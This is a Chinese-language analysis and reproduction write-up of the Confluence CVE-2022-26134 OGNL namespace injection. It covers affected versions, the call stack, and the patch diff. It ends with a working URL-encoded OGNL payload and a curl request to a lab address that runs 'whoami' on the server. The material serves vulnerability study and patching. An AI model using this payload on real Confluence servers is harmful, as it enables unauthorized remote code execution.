Confluence CVE-2022-26134漏洞分析复现
漏洞信息
受影响版本
- 1.3.0 <= Confluence Server and Data Center < 7.4.17
- 7.13.0 <= Confluence Server and Data Center < 7.13.7
- 7.14.0 <= Confluence Server and Data Center < 7.14.3
- 7.15.0 <= Confluence Server and Data Center < 7.15.2
- 7.16.0 <= Confluence Server and Data Center < 7.16.4
- 7.17.0 <= Confluence Server and Data Center < 7.17.4
- 7.18.0 <= Confluence Server and Data Center < 7.18.1
不受影响版本
- Confluence Server and Data Center 7.4.17
- Confluence Server and Data Center 7.13.7
- Confluence Server and Data Center 7.14.3
- Confluence Server and Data Center 7.15.2
- Confluence Server and Data Center 7.16.4
- Confluence Server and Data Center 7.17.4
- Confluence Server and Data Center 7.18.1
经测试 Atlassian Confluence 6.7.1也受到影响
漏洞分析
根据调用堆栈
at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)
at ognl.SimpleNode.getValue(SimpleNode.java:193)
at ognl.Ognl.getValue(Ognl.java:333)
at ognl.Ognl.getValue(Ognl.java:310)A
at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)
at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)
at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)
at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)
at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)
at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)
at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)
at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)
at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)
at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)
at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)
我们从com.opensymphony.webwork.dispatcher.ServletDispatcher.service
开始分析
然后跟进getNameSpace函数
这里最终返回了/${4*4}
然后继续跟进serviceAction
这里经过处理之后出来继续进入proxy.execute();
进入之后经过invoke()
处理
然后进入到invoke,这里会不断地循环
这个循环中会进入不同的invoke方法,其中最重要的就是返回 notpermitted 并赋值给 resultCode。
最终进入下面的
继续跟进execute
这里传入的参数就是我们刚才赋值的namespace
然后进入这里
这里就比较明朗了
最终在这里执行了任意代码。
总结
这个漏洞于CVE-2018-11776很相似。也是命民空间的OGNL注入漏洞
补丁对比
前
public void execute(ActionInvocation invocation) throws Exception {
if (this.namespace == null)
this.namespace = invocation.getProxy().getNamespace();
OgnlValueStack stack = ActionContext.getContext().getValueStack();
String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);
String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);
后
public void execute(ActionInvocation invocation) throws Exception {
if (this.namespace == null)
this.namespace = invocation.getProxy().getNamespace();
String finalNamespace = this.namespace;
String finalActionName = this.actionName;
同时,Atlassian
也添加了SafeExpressionUtil.class
对不安全的表达式进行过滤
并在findValue
函数运行时进行检查。
/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22whoami%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%7D/
curl -v http://192.168.44.163:8090/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22whoami%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%7D/
参考
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html